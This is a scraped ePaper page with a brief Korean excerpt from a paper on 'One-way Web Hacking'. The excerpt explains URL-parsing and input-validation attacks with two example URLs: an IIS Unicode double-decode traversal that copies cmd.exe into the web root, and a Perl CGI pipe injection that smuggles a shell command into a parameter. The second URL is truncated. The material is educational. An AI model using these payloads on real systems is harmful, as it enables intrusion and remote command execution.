12.07.2013 Views

One-way Web Hacking

One-way Web Hacking

One-way Web Hacking

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

3.0.1 Exploiting URL parsing<br />

Unicode / Double decode 공격은 고전적인 URL parsing 취약점의 예이다. 아래의 URL은 웹 서버의 document root 내에<br />

있는 “scripts/” 디렉토리에 명령 해석기 cmd.exe를 복사한다.<br />

http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+<br />

c:\winnt\system32\cmd.exe+c:\inetpub\scripts<br />

3.0.2 Exploiting poorly validated input parameters<br />

이 예에서, 체크되지 않은 파라미터가 안전하지 않은 방식으로 open() 호출을 사용하여 URL로부터 Perl CGI script<br />

news.cgi로 전달된다.<br />

http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!